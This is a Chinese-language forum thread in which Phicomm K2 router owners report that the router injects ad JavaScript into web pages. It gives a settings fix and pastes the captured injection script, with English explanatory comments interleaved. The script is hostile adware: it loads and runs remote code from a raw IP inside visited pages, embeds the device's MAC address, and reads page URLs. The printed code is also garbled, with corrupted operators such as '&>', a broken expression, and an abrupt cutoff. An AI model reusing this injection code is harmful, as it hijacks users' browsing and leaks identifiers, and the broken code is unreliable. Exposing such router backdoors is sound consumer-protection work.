請問各位,斐訊k2路由器真的有後門嗎?

請問下,我昨天剛在京東以379的價格下單了K2路由器5台。聽說不少人說這款路由器有後門 會上傳用戶的個人信息,我想問一下,有沒有人真實發現了這個問題,或者真的在使用後出現了實際的泄漏?謝謝!!!


用了0元購的斐訊K2路由器之後,會發現瀏覽器訪問網頁時,頁面里經常多出一段來自 http://js.s9w.cc 的 js,這是明顯的劫持,網上說是斐訊K2的後門在惡意注入。經「真的值得買」小編測試後發現,登錄路由器後台(192.168.2.1),關掉「系統設置」→「應用設置」里的「購物比價」功能,即可解決這個問題。
不放心的朋友還是自行刷機吧,可是別人修改的固件你又放心嗎?當然,我們可以刷華碩路由器的官方rom。

瀏覽器里出現js.s9w.cc的js是個什麼鬼?原來是斐訊k2路由器 的購物比價功能在搗蛋


本人已經入坑,確定了至少有廣告後門。

半年前在jd上花399元買的斐訊K2,當時不知道0元購機,也不知道啥叫K碼。買來就閑置了一段時間,最近用上之後,發現有些根本不可能有廣告的網站竟然彈出廣告了。第一反應就是路由器出問題了,對比了同一頁面中廣告和沒中廣告時的源碼,發現多了這麼一段

&&

蛋疼。

訪問頁面http://222.73.156.145/587?MAC=747D240CC8C0 看看:

(function () {

// Configuration and bootstrap of the captured ad-injection script. These statements
// run inside the enclosing anonymous function that opens just above.
// Base URL of the server the injected resources are fetched from (plain HTTP, raw IP).
var ip = "http://222.73.156.145";
// Per-platform switches. `android` is tested further down in aa().
// NOTE(review): pc and ios are presumably tested in the part of aa() not shown here — confirm.
var pc = false;
var android = true;
var ios = true;
// The variables below are meant to be replaced by hand
// NOTE(review): ad_customer equals the "587" path segment and deviceMac equals the MAC
// query value of the URL this script was served from, so the script looks generated per
// device and carries a device MAC address into every page it is injected into.
var ad_customer = "587";
var mid = "561";
var deviceMac = "74:7D:24:0C:C8:C0";
// Load a file named jquery-1.11.2.min.js from the same server, then run aa() from the
// callback. The file is added to the visited page itself, so (assuming it really is
// jQuery) it defines `$` in that page's global scope.
loadExternResource({
scripts: [{tag: "script", url: ip + "/material/common/js/jquery-1.11.2.min.js"}],
callBack: function () {
// Must wait until the DOM body has finished loading before loading anything further
$(function(){
//console.log(document.readyState);
aa();
})

}
});

// Appends the stylesheets and scripts described by `obj` to the first <head> element of
// the current document and, when a callback is given, calls it once every script has
// reported that it loaded.
//   obj.links    - optional list of { url } entries, each added as <link rel="stylesheet">
//   obj.scripts  - optional list of { url } entries, each added as <script>; any other
//                  field on an entry (such as `tag`) is not read here
//   obj.callBack - optional function called with no arguments after all scripts loaded
// Returns nothing. Side effects: new elements in <head>, and a `loadState` flag written
// onto every entry of obj.scripts when a callback is supplied.
// Review notes for analysts: only `type` and `src` are set on the script elements, so
// no integrity attribute restricts what the remote URL may serve; and no error handler
// is attached, so a script that fails to load leaves callBack uncalled.
function loadExternResource(obj) {
var elem, links, scripts, callBack, hasReadyState;
var head = document.getElementsByTagName("head")[0];
var ObjOrg = {links: null, scripts: null, callBack: null};

// Overlay the caller's properties on the defaults. for...in also visits inherited
// enumerable properties, so anything enumerable on obj's prototype is copied too.
for (var prop in obj) {
ObjOrg[prop] = obj[prop];
}

links = ObjOrg.links;
scripts = ObjOrg.scripts;
callBack = ObjOrg.callBack;

// Loose != undefined is false for both the null default and undefined, so an omitted
// list is skipped.
if (links != undefined) {
for (var i in links) {
elem = document.createElement("link");
elem.rel = "stylesheet";
elem.href = links[i].url;
head.appendChild(elem);
}
}

if (scripts != undefined) {
var load, loadHandle, loadCallBack;

// This first element is never appended; it exists only so the readyState check below
// can detect which load-notification mechanism the browser offers.
elem = document.createElement("script");
elem.type = "text/javascript";

if (callBack != undefined) {
hasReadyState = (elem.readyState != undefined);
// Marks one script as loaded, then returns early while any entry is still pending;
// the callback fires only on the call that finds every flag set.
loadCallBack = function (index) {
scripts[index].loadState = true;

for (var j in scripts) {
if (false == scripts[j].loadState) {
return;
}
}

callBack();
};

// Reset every flag before any element is inserted.
for (var i in scripts) {
scripts[i].loadState = false;
}
}

for (var i in scripts) {
elem = document.createElement("script");
elem.type = "text/javascript";

if (callBack != undefined) {
if (hasReadyState) {
// readyState path: the immediately-invoked wrapper captures the current index for
// the handler, which unhooks itself before reporting so it reports only once.
elem.onreadystatechange = (function (index) {
return function () {
if (this.readyState == "loaded" || this.readyState == "complete") {
this.onreadystatechange = null;
loadCallBack(index);
}
};
})(i);
} else {
// onload path for browsers whose script elements have no readyState.
elem.onload = (function (index) {
return function () {
loadCallBack(index);
};
})(i);
}
}

// Handlers are attached before src is set and the element is inserted.
elem.src = scripts[i].url;
head.appendChild(elem);
}
}
}

// Returns the character set the current document reports.
// Only the "FIREFOX" label from getBrowser() selects document.characterSet; the "IE"
// label and every other value, including the empty string, read document.charset.
function getPageCharset() {
  var browserLabel = getBrowser();
  if (browserLabel === "FIREFOX") {
    return document.characterSet;
  }
  return document.charset;
}

// Classifies the browser from substrings of navigator.userAgent.
// Returns "IE" when the string contains "MSIE", otherwise "FIREFOX" when it contains
// "Firefox", otherwise the empty string. "MSIE" is checked first, so it wins when both
// tokens are present.
function getBrowser() {
  var agent = navigator.userAgent;
  if (agent.indexOf("MSIE") !== -1) {
    return "IE";
  }
  if (agent.indexOf("Firefox") !== -1) {
    return "FIREFOX";
  }
  return "";
}

function aa() {
/* $.get("http://" + ip + "/getIndex/"+ad_customer+"?MAC="+deviceMac, function(data){
ad_customer =data;
alert("material id"+ ad_customer);
});*/

//增加禁止域名判斷
if(forbidHost()){
return false;
}

hostUrl = encodeURIComponent(top.window.location.href);
var browser = {
versions: function () {
var u = navigator.userAgent, app = navigator.appVersion;
return {
trident: u.indexOf("Trident") &> -1, //IE內核
presto: u.indexOf("Presto") &> -1, //opera內核
webKit: u.indexOf("AppleWebKit") &> -1, //蘋果、谷歌內核
gecko: u.indexOf("Gecko") &> -1 u.indexOf("KHTML") == -1, //火狐內核
mobile: !!u.match(/AppleWebKit.*Mobile.*/) || !!u.match(/AppleWebKit/), //是否為移動終端
ios: !!u.match(/(i[^;]+;( U;)? CPU.+Mac OS X/), //ios終端
android: u.indexOf("Android") &> -1 || u.indexOf("Linux") &> -1, //android終端或者uc瀏覽器
iPhone: u.indexOf("iPhone") &> -1 || u.indexOf("Mac") &> -1, //是否為iPhone或者QQHD瀏覽器
iPad: u.indexOf("iPad") &> -1, //是否iPad
webApp: u.indexOf("Safari") == -1 //是否web應該程序,沒有頭部與底部
};
}()
}

if (isWeiXin() || isAPP()) {

} else if (browser.versions.android == true) { //只投Android
if(android){
str_html = "&